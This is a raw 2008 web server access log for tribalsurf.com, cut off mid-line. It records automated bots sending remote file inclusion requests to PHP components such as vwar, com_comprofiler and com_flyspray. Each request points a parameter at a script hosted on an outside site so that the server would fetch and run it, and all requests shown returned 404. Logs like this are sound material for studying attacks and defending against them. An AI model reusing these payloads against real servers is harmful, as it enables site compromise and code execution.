216.246.28.43 - - [31/Aug/2008:22:14:36 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:14:37 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:14:37 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
74.55.37.146 - - [31/Aug/2008:22:15:06 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:15:35 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:15:36 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:15:36 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:15:46 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:15:47 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:15:47 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:16:45 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:16:46 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:16:46 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
151.11.24.250 - - [31/Aug/2008:22:17:37 -0700] "GET /logs/access.log%20//admin/business_inc/saveserver.php?thisdir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:22:19:19 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:22:19:19 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
74.55.37.146 - - [31/Aug/2008:22:21:43 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
74.55.37.146 - - [31/Aug/2008:22:21:43 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:22:23:32 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:22:23:32 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:22:23:32 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
72.9.246.218 - - [31/Aug/2008:22:23:38 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
72.9.246.218 - - [31/Aug/2008:22:23:38 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
72.9.246.218 - - [31/Aug/2008:22:23:38 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
72.9.246.218 - - [31/Aug/2008:22:24:37 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:22:29:39 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:22:29:39 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:22:29:39 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt%0D?? HTTP/1.1" 404 275 "-" "libw